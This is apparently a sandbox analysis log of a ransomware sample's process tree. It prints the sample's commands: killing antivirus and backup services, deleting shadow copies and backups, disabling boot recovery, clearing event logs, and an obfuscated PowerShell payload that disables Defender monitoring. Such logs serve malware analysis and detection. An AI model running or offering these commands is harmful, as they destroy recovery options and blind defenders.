PID 2240 wrote to memory of 2696	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	78

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "net stop Tmlisten /y"
1⤵
PID:1468
- C:\Windows\SysWOW64\net.exe
  net stop Tmlisten /y
  2⤵
  PID:4080
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop Tmlisten /y
    3⤵
    PID:4300

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "net stop Ntrtscan /y"
1⤵
PID:1972
- C:\Windows\SysWOW64\net.exe
  net stop Ntrtscan /y
  2⤵
  PID:4044
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop Ntrtscan /y
    3⤵
    PID:652

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "net stop AOTAgentSvc /y"
1⤵
PID:1104
- C:\Windows\SysWOW64\net.exe
  net stop AOTAgentSvc /y
  2⤵
  PID:4068
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop AOTAgentSvc /y
    3⤵
    PID:4780

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "vssadmin resize shadowstorage /for=B: /on=C: /maxsize=401MB"
1⤵
PID:1568
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin resize shadowstorage /for=B: /on=C: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:3996

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "vssadmin resize shadowstorage /for=Y: /on=C: /maxsize=401MB"
1⤵
PID:1260
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin resize shadowstorage /for=Y: /on=C: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:3088

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "vssadmin resize shadowstorage /for=W: /on=C: /maxsize=401MB"
1⤵
PID:2320
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin resize shadowstorage /for=W: /on=C: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:4092

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "net stop Tmccst /y"
1⤵
PID:1232
- C:\Windows\SysWOW64\net.exe
  net stop Tmccst /y
  2⤵
  PID:2884
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop Tmccst /y
    3⤵
    PID:4760

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "vssadmin resize shadowstorage /for=V: /on=C: /maxsize=401MB"
1⤵
PID:2356
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin resize shadowstorage /for=V: /on=C: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:3984

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "vssadmin resize shadowstorage /for=X: /on=C: /maxsize=401MB"
1⤵
PID:1056
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin resize shadowstorage /for=X: /on=C: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:3740

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "net stop Web Service Communicator /y"
1⤵
PID:2328
- C:\Windows\SysWOW64\net.exe
  net stop Web Service Communicator /y
  2⤵
  PID:2248
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop Web Service Communicator /y
    3⤵
    PID:3576

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "vssadmin resize shadowstorage /for=U: /on=C: /maxsize=401MB"
1⤵
PID:1544
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin resize shadowstorage /for=U: /on=C: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:3752

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "net stop Trend Micro /y"
1⤵
PID:2324
- C:\Windows\SysWOW64\net.exe
  net stop Trend Micro /y
  2⤵
  PID:3908
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop Trend Micro /y
    3⤵
    PID:4764

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "net stop iVPAgent /y"
1⤵
PID:1496
- C:\Windows\SysWOW64\net.exe
  net stop iVPAgent /y
  2⤵
  PID:3912
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop iVPAgent /y
    3⤵
    PID:4748

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "wevtutil cl system"
1⤵
PID:2332
- C:\Windows\SysWOW64\wevtutil.exe
  wevtutil cl system
  2⤵
  - Clears Windows event logs
  - Suspicious use of AdjustPrivilegeToken
  PID:3192

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "vssadmin resize shadowstorage /for=T: /on=C: /maxsize=401MB"
1⤵
PID:620
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin resize shadowstorage /for=T: /on=C: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:1752

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "vssadmin resize shadowstorage /for=O: /on=C: /maxsize=401MB"
1⤵
PID:2056
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin resize shadowstorage /for=O: /on=C: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:3936

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "vssadmin resize shadowstorage /for=O: /on=C: /maxsize=401MB"
1⤵
PID:2104
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin resize shadowstorage /for=O: /on=C: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:3600

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "vssadmin resize shadowstorage /for=M: /on=C: /maxsize=401MB"
1⤵
PID:2680
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin resize shadowstorage /for=M: /on=C: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:3732

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "vssadmin resize shadowstorage /for=K: /on=C: /maxsize=401MB"
1⤵
PID:2188
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin resize shadowstorage /for=K: /on=C: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:3644

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "vssadmin resize shadowstorage /for=Q: /on=C: /maxsize=401MB"
1⤵
PID:1464
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin resize shadowstorage /for=Q: /on=C: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:3828

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "net stop TMBMServer /y"
1⤵
PID:2460
- C:\Windows\SysWOW64\net.exe
  net stop TMBMServer /y
  2⤵
  PID:3796
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop TMBMServer /y
    3⤵
    PID:4216

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "vssadmin resize shadowstorage /for=N: /on=C: /maxsize=401MB"
1⤵
PID:2384
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin resize shadowstorage /for=N: /on=C: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:3820

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "vssadmin resize shadowstorage /for=L: /on=C: /maxsize=401MB"
1⤵
PID:2368
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin resize shadowstorage /for=L: /on=C: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:3840

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "vssadmin resize shadowstorage /for=H: /on=C: /maxsize=401MB"
1⤵
PID:2408
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin resize shadowstorage /for=H: /on=C: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:3676

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB"
1⤵
PID:1988
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:3356

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "vssadmin resize shadowstorage /for=D: /on=C: /maxsize=401MB"
1⤵
PID:1640
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin resize shadowstorage /for=D: /on=C: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:3608

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "vssadmin resize shadowstorage /for=I: /on=C: /maxsize=401MB"
1⤵
PID:2444
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin resize shadowstorage /for=I: /on=C: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:3204

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "vssadmin resize shadowstorage /for=E: /on=C: /maxsize=401MB"
1⤵
PID:1768
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin resize shadowstorage /for=E: /on=C: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:3004

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "vssadmin resize shadowstorage /for=F: /on=C: /maxsize=401MB"
1⤵
PID:2060
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin resize shadowstorage /for=F: /on=C: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:3708

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "vssadmin resize shadowstorage /for=G: /on=C: /maxsize=401MB"
1⤵
PID:2928
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin resize shadowstorage /for=G: /on=C: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:4060

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "vssadmin resize shadowstorage /for=A: /on=C: /maxsize=401MB"
1⤵
PID:1668
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin resize shadowstorage /for=A: /on=C: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:3692

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "vssadmin resize shadowstorage /for=S: /on=C: /maxsize=401MB"
1⤵
PID:1860
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin resize shadowstorage /for=S: /on=C: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:3712

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "vssadmin resize shadowstorage /for=R: /on=C: /maxsize=401MB"
1⤵
PID:1812
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin resize shadowstorage /for=R: /on=C: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:3224

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "vssadmin resize shadowstorage /for=J: /on=C: /maxsize=401MB"
1⤵
PID:3044
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin resize shadowstorage /for=J: /on=C: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:3684

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "wbadmin DELETE SYSTEMSTATEBACKUP"
1⤵
PID:1092

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "bcdedit /set {default} bootstatuspolicy ignoreallfailures"
1⤵
PID:1656

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "taskkill /f /im vastsvc.exe"
1⤵
PID:876
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im vastsvc.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4052

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "net stop TMResponse /y"
1⤵
PID:1444
- C:\Windows\SysWOW64\net.exe
  net stop TMResponse /y
  2⤵
  PID:3660
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop TMResponse /y
    3⤵
    PID:4396

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "net stop Avast Antivirus! /y"
1⤵
PID:576
- C:\Windows\SysWOW64\net.exe
  net stop Avast Antivirus! /y
  2⤵
  PID:4024
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop Avast Antivirus! /y
    3⤵
    PID:1092

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "taskkill /f /im SophosSAU.exe"
1⤵
PID:348
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im SophosSAU.exe
  2⤵
  PID:3120

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "bcdedit /set {default} recoveryenabled No"
1⤵
PID:2808

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "wbadmin delete catalog -quiet"
1⤵
PID:2800

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "wevtutil cl application"
1⤵
PID:2816
- C:\Windows\SysWOW64\wevtutil.exe
  wevtutil cl application
  2⤵
  - Clears Windows event logs
  PID:3196

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "taskkill /f /im McAfeeFramework.exe"
1⤵
PID:688
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im McAfeeFramework.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3160

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "taskkill /f /im NortonSecurity.exe"
1⤵
PID:268
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im NortonSecurity.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3952

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "vssadmin delete shadows /all /quiet"
1⤵
PID:528
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin delete shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:3144

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "taskkill /f /im avgsvc.exe"
1⤵
PID:2820
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im avgsvc.exe
  2⤵
  PID:3960

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "taskkill /f /im SupportConnector.exe"
1⤵
PID:2652
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im SupportConnector.exe
  2⤵
  PID:3976

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "taskkill /f /im PccNTMon.exe"
1⤵
PID:2496
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im PccNTMon.exe
  2⤵
  PID:3920

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "taskkill /f /im ResponseService.exe"
1⤵
PID:788
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im ResponseService.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3968

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "wevtutil cl securit"
1⤵
PID:1820
- C:\Windows\SysWOW64\wevtutil.exe
  wevtutil cl securit
  2⤵
  - Clears Windows event logs
  - Suspicious use of AdjustPrivilegeToken
  PID:3184

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "net stop BackupExecAgentBrowser /y"
1⤵
PID:2024
- C:\Windows\SysWOW64\net.exe
  net stop BackupExecAgentBrowser /y
  2⤵
  PID:3892
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
    3⤵
    PID:4140

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest"
1⤵
PID:2028

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "taskkill /f /im KasperskyService.exe"
1⤵
PID:1716
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im KasperskyService.exe
  2⤵
  PID:3852

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "taskkill /f /im tmwscsvc.exe"
1⤵
PID:740
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im tmwscsvc.exe
  2⤵
  PID:3944

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "taskkill /f /im iVPAgent.exe"
1⤵
PID:600
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im iVPAgent.exe
  2⤵
  PID:3876

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "taskkill /f /im powerpnt.exe"
1⤵
PID:2996
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im powerpnt.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3800

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "taskkill /f /im AOTAgent.exe"
1⤵
PID:2988
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im AOTAgent.exe
  2⤵
  PID:3620

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "vssadmin resize shadowstorage /for=Z: /on=C: /maxsize=401MB"
1⤵
PID:2984
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin resize shadowstorage /for=Z: /on=C: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:3524

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "taskkill /f /im CETASvc.exe"
1⤵
PID:2936
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im CETASvc.exe
  2⤵
  PID:3612

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "powershell.exe -ep bypass -ec CgAoACgAJwBTACcAKwAnAHQAYQByAHQAJwArACcALQBQAHIAbwBjAGUAcwBzACcAKwAnACAALQAnACsAJwBGAGkAbABlAFAAJwArACcAYQB0AGgAIABrAHAAbgBwACcAKwAnAG8AJwArACcAdwAnACsAJwBlAHIAcwAnACsAJwBoAGUAbABsAC4AZQAnACsAJwB4AGUAawBwAG4AIAAnACsAJwAtAEEAJwArACcAcgAnACsAJwBnAHUAbQAnACsAJwBlAG4AJwArACcAdABMACcAKwAnAGkAJwArACcAcwB0ACAAJwArACcAZwBWAHQALQAnACsAJwBlAHAAIABiAHkAcABhAHMAcwAgACcAKwAnAC0AdwAgAGgAaQBkAGQAZQAnACsAJwBuACAAJwArACcALQBjACAAawBwAG4AJwArACcAdwBoAGkAJwArACcAbABlACgASAAnACsAJwBLAGkAJwArACcAdAByAHUAZQApACcAKwAnAHsAJwArACcAIAAnACsAJwBTACcAKwAnAGUAJwArACcAdAAnACsAJwAtAE0AcABQAHIAZQAnACsAJwBmACcAKwAnAGUAcgBlACcAKwAnAG4AYwBlACcAKwAnACAALQBEAGkAcwBhAGIAbABlAFIAJwArACcAZQBhAGwAJwArACcAdABpAG0AZQBNAG8AJwArACcAbgAnACsAJwBpAHQAbwByAGkAJwArACcAbgBnACAAJwArACcASABLAGkAJwArACcAdAAnACsAJwByAHUAJwArACcAZQAgACcAKwAnAH0AawBwACcAKwAnAG4AZwBWAHQACgBTAHQAYQByACcAKwAnAHQAJwArACcALQAnACsAJwBQAHIAbwBjACcAKwAnAGUAcwBzACAALQBGAGkAbABlAFAAYQB0ACcAKwAnAGgAJwArACcAIABrAHAAJwArACcAbgBwAG8AdwAnACsAJwBlAHIAcwBoAGUAJwArACcAbABsACcAKwAnAC4AZQB4AGUAJwArACcAawBwAG4AJwArACcAIAAnACsAJwAtAEEAcgBnAHUAbQBlACcAKwAnAG4AdABMAGkAcwB0ACAAJwArACcAZwBWAHQALQBlAHAAIABiAHkAcABhACcAKwAnAHMAJwArACcAcwAnACsAJwAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQAnACsAJwBjACAAawBwACcAKwAnAG4AJwArACcAdwBoAGkAJwArACcAbABlACcAKwAnACgASABLAGkAdAByAHUAZQApAHsAIAAnACsAJwB0ACcAKwAnAGEAcwBrAGsAaQBsACcAKwAnAGwAIAAvAGYAIAAvAGkAJwArACcAbQAgAHQAYQBzAGsAJwArACcAawBpAGwAbAAuAGUAeABlACcAKwAnAH0AawBwAG4AZwBWACcAKwAnAHQACgAnACsAJwBTAHQAJwArACcAYQByAHQAJwArACcALQBQACcAKwAnAHIAbwBjAGUAcwBzACAALQBGACcAKwAnAGkAbABlAFAAJwArACcAYQB0AGgAIAAnACsAJwBrAHAAJwArACcAbgAnACsAJwBwAG8AJwArACcAdwAnACsAJwBlAHIAcwBoAGUAJwArACcAbABsAC4AZQAnACsAJwB4AGUAawAnACsAJwBwAG4AJwArACcAIAAnACsAJwAtAEEAcgBnAHUAJwArACcAbQBlAG4AdABMAGkAcwAnACsAJwB0ACcAKwAnACAAJwArACcAZwAnACsAJwBWAHQALQBlAHAAIABiAHkAcABhACcAKwAnAHMAcwAgAC0AdwAnACsAJwAgACcAKwAnAGgAaQBkAGQAJwArACcAZQAnACsAJwBuACcAKwAnACAALQAnACsAJwBjACAAJwArACcAawBwAG4AdwAnACsAJwBoAGkAbAAnACsAJwBlACgASABLAGkAdAAnACsAJwByAHUAZQAnACsAJwApAHsAIAAnACsAJwB0AGEAcwBrAGsAaQBsAGwAIAAvAGYAJwArACcAIAAvAGkAbQAgAHQAJwArACcAYQAnACsAJwBzACcAKwAnAGsAJwArACcAbABpAHMAdAAuAGUAJwArACcAeABlAH0AawBwAG4AZwBWAHQACgBTAHQAJwArACcAYQByACcAKwAnAHQALQBQAHIAbwBjAGUAJwArACcAcwBzACcAKwAnACAALQBGACcAKwAnAGkAbABlAFAAYQAnACsAJwB0AGgAIABrAHAAbgBwAG8AdwBlAHIAcwBoAGUAbAAnACsAJwBsAC4AZQB4AGUAJwArACcAawBwAG4AIAAtAEEAcgAnACsAJwBnAHUAbQBlAG4AdABMAGkAJwArACcAcwB0ACAAZwBWAHQALQBlAHAAIABiACcAKwAnAHkAJwArACcAcABhACcAKwAnAHMAJwArACcAcwAgACcAKwAnAC0AJwArACcAdwAgAGgAaQBkAGQAJwArACcAZQBuACAALQBjACAAawBwAG4AdwAnACsAJwBoAGkAbABlACgASABLAGkAdAByACcAKwAnAHUAJwArACcAZQAnACsAJwApAHsAIAAnACsAJwB0AGEAcwBrAGsAaQBsAGwAIAAvAGYAJwArACcAIAAnACsAJwAvAGkAJwArACcAbQAgAHQAYQAnACsAJwBzAGsAbQBnAHIALgAnACsAJwBlAHgAZQAnACsAJwB9ACcAKwAnAGsAcABuAGcAJwArACcAVgB0AAoAJwArACcAUwB0AGEAcgB0AC0AUAByAG8AJwArACcAYwBlAHMAcwAnACsAJwAgAC0ARgBpAGwAZQAnACsAJwBQAGEAdABoACAAawBwAG4AJwArACcAcABvAHcAZQByAHMAaABlAGwAJwArACcAbAAuAGUAeABlACcAKwAnAGsAcAAnACsAJwBuACAALQBBAHIAZwAnACsAJwB1AG0AZQAnACsAJwBuACcAKwAnAHQATABpAHMAdAAnACsAJwAgAGcAVgB0AC0AZQBwACAAJwArACcAYgB5AHAAJwArACcAYQBzACcAKwAnAHMAIAAnACsAJwAtAHcAIABoAGkAZABkAGUAbgAnACsAJwAgAC0AJwArACcAYwAgAGsAcAAnACsAJwBuACcAKwAnAHcAaABpAGwAZQAoAEgASwBpAHQAcgAnACsAJwB1AGUAKQB7ACcAKwAnACAAdABhAHMAawBrAGkAbABsACAAJwArACcALwBmACcAKwAnACAAJwArACcALwAnACsAJwBpAG0AIABjAG0AZAAuAGUAeABlAH0AJwArACcAawBwAG4AZwBWAHQACgBTACcAKwAnAHQAJwArACcAYQByACcAKwAnAHQALQAnACsAJwBQAHIAbwAnACsAJwBjAGUAcwAnACsAJwBzACAALQBGAGkAbAAnACsAJwBlAFAAYQAnACsAJwB0AGgAJwArACcAIABrAHAAbgBwAG8AdwBlAHIAcwBoAGUAbABsACcAKwAnAC4AZQB4AGUAawAnACsAJwBwAG4AIAAtACcAKwAnAEEAJwArACcAcgBnAHUAJwArACcAbQBlAG4AdAAnACsAJwBMAGkAcwAnACsAJwB0ACAAZwBWAHQALQBlAHAAIABiAHkAcABhAHMAJwArACcAcwAnACsAJwAgAC0AJwArACcAdwAgAGgAaQBkAGQAJwArACcAZQBuACAALQBjACcAKwAnACAAJwArACcAawAnACsAJwBwAG4AdwAnACsAJwBoAGkAbAAnACsAJwBlACgASABLAGkAdAByAHUAZQApACcAKwAnAHsAJwArACcAIAB0AGEAcwBrAGsAaQBsAGwAJwArACcAIAAnACsAJwAvAGYAIAAvAGkAbQAnACsAJwAgAHAAcwAuACcAKwAnAGUAJwArACcAeAAnACsAJwBlAH0AawBwAG4AZwBWAHQAJwApACAAIAAtAEMAcgBFAHAAbABBAGMARQAnAGcAVgB0ACcALABbAEMASABBAHIAXQAzADkAIAAtAHIARQBQAGwAQQBDAEUAIAAoAFsAQwBIAEEAcgBdADcAMgArAFsAQwBIAEEAcgBdADcANQArAFsAQwBIAEEAcgBdADEAMAA1ACkALABbAEMASABBAHIAXQAzADYAIAAtAHIARQBQAGwAQQBDAEUAJwBrAHAAbgAnACwAWwBDAEgAQQByAF0AMwA0ACkAIAB8ACAAJgAgACgAIAAkAHYARQByAGIAbwBTAEUAUAByAEUAZgBFAFIAZQBuAEMARQAuAHQAbwBzAHQAcgBpAE4AZwAoACkAWwAxACwAMwBdACsAJwB4ACcALQBKAG8ASQBOACcAJwApAAoA"
1⤵
PID:2940
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -ep bypass -ec CgAoACgAJwBTACcAKwAnAHQAYQByAHQAJwArACcALQBQAHIAbwBjAGUAcwBzACcAKwAnACAALQAnACsAJwBGAGkAbABlAFAAJwArACcAYQB0AGgAIABrAHAAbgBwACcAKwAnAG8AJwArACcAdwAnACsAJwBlAHIAcwAnACsAJwBoAGUAbABsAC4AZQAnACsAJwB4AGUAawBwAG4AIAAnACsAJwAtAEEAJwArACcAcgAnACsAJwBnAHUAbQAnACsAJwBlAG4AJwArACcAdABMACcAKwAnAGkAJwArACcAcwB0ACAAJwArACcAZwBWAHQALQAnACsAJwBlAHAAIABiAHkAcABhAHMAcwAgACcAKwAnAC0AdwAgAGgAaQBkAGQAZQAnACsAJwBuACAAJwArACcALQBjACAAawBwAG4AJwArACcAdwBoAGkAJwArACcAbABlACgASAAnACsAJwBLAGkAJwArACcAdAByAHUAZQApACcAKwAnAHsAJwArACcAIAAnACsAJwBTACcAKwAnAGUAJwArACcAdAAnACsAJwAtAE0AcABQAHIAZQAnACsAJwBmACcAKwAnAGUAcgBlACcAKwAnAG4AYwBlACcAKwAnACAALQBEAGkAcwBhAGIAbABlAFIAJwArACcAZQBhAGwAJwArACcAdABpAG0AZQBNAG8AJwArACcAbgAnACsAJwBpAHQAbwByAGkAJwArACcAbgBnACAAJwArACcASABLAGkAJwArACcAdAAnACsAJwByAHUAJwArACcAZQAgACcAKwAnAH0AawBwACcAKwAnAG4AZwBWAHQACgBTAHQAYQByACcAKwAnAHQAJwArACcALQAnACsAJwBQAHIAbwBjACcAKwAnAGUAcwBzACAALQBGAGkAbABlAFAAYQB0ACcAKwAnAGgAJwArACcAIABrAHAAJwArACcAbgBwAG8AdwAnACsAJwBlAHIAcwBoAGUAJwArACcAbABsACcAKwAnAC4AZQB4AGUAJwArACcAawBwAG4AJwArACcAIAAnACsAJwAtAEEAcgBnAHUAbQBlACcAKwAnAG4AdABMAGkAcwB0ACAAJwArACcAZwBWAHQALQBlAHAAIABiAHkAcABhACcAKwAnAHMAJwArACcAcwAnACsAJwAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQAnACsAJwBjACAAawBwACcAKwAnAG4AJwArACcAdwBoAGkAJwArACcAbABlACcAKwAnACgASABLAGkAdAByAHUAZQApAHsAIAAnACsAJwB0ACcAKwAnAGEAcwBrAGsAaQBsACcAKwAnAGwAIAAvAGYAIAAvAGkAJwArACcAbQAgAHQAYQBzAGsAJwArACcAawBpAGwAbAAuAGUAeABlACcAKwAnAH0AawBwAG4AZwBWACcAKwAnAHQACgAnACsAJwBTAHQAJwArACcAYQByAHQAJwArACcALQBQACcAKwAnAHIAbwBjAGUAcwBzACAALQBGACcAKwAnAGkAbABlAFAAJwArACcAYQB0AGgAIAAnACsAJwBrAHAAJwArACcAbgAnACsAJwBwAG8AJwArACcAdwAnACsAJwBlAHIAcwBoAGUAJwArACcAbABsAC4AZQAnACsAJwB4AGUAawAnACsAJwBwAG4AJwArACcAIAAnACsAJwAtAEEAcgBnAHUAJwArACcAbQBlAG4AdABMAGkAcwAnACsAJwB0ACcAKwAnACAAJwArACcAZwAnACsAJwBWAHQALQBlAHAAIABiAHkAcABhACcAKwAnAHMAcwAgAC0AdwAnACsAJwAgACcAKwAnAGgAaQBkAGQAJwArACcAZQAnACsAJwBuACcAKwAnACAALQAnACsAJwBjACAAJwArACcAawBwAG4AdwAnACsAJwBoAGkAbAAnACsAJwBlACgASABLAGkAdAAnACsAJwByAHUAZQAnACsAJwApAHsAIAAnACsAJwB0AGEAcwBrAGsAaQBsAGwAIAAvAGYAJwArACcAIAAvAGkAbQAgAHQAJwArACcAYQAnACsAJwBzACcAKwAnAGsAJwArACcAbABpAHMAdAAuAGUAJwArACcAeABlAH0AawBwAG4AZwBWAHQACgBTAHQAJwArACcAYQByACcAKwAnAHQALQBQAHIAbwBjAGUAJwArACcAcwBzACcAKwAnACAALQBGACcAKwAnAGkAbABlAFAAYQAnACsAJwB0AGgAIABrAHAAbgBwAG8AdwBlAHIAcwBoAGUAbAAnACsAJwBsAC4AZQB4AGUAJwArACcAawBwAG4AIAAtAEEAcgAnACsAJwBnAHUAbQBlAG4AdABMAGkAJwArACcAcwB0ACAAZwBWAHQALQBlAHAAIABiACcAKwAnAHkAJwArACcAcABhACcAKwAnAHMAJwArACcAcwAgACcAKwAnAC0AJwArACcAdwAgAGgAaQBkAGQAJwArACcAZQBuACAALQBjACAAawBwAG4AdwAnACsAJwBoAGkAbABlACgASABLAGkAdAByACcAKwAnAHUAJwArACcAZQAnACsAJwApAHsAIAAnACsAJwB0AGEAcwBrAGsAaQBsAGwAIAAvAGYAJwArACcAIAAnACsAJwAvAGkAJwArACcAbQAgAHQAYQAnACsAJwBzAGsAbQBnAHIALgAnACsAJwBlAHgAZQAnACsAJwB9ACcAK